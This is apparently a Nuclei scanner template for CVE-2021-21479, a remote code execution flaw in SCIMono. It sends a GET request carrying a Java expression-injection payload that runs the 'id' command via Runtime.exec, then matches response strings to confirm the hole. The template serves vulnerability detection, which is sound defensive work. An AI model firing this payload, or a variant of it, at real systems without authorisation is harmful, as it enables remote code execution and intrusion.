id: CVE-2021-21479

info:
  name: SCIMono < v0.0.19 Remote Code Execution
  author: dwisiswant0
  severity: critical
  reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
  description: |
    In SCIMono before 0.0.19, it is possible for an attacker to inject and execute Java expressions, compromising the availability and integrity of the system.
  tags: cve,cve2021,scimono,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"

    matchers:
      - type: word
        words:
          - "The attribute value"
          - "java.lang.UNIXProcess@"
          - "has invalid value!"
          - '"status" : "400"'
        part: body
        condition: and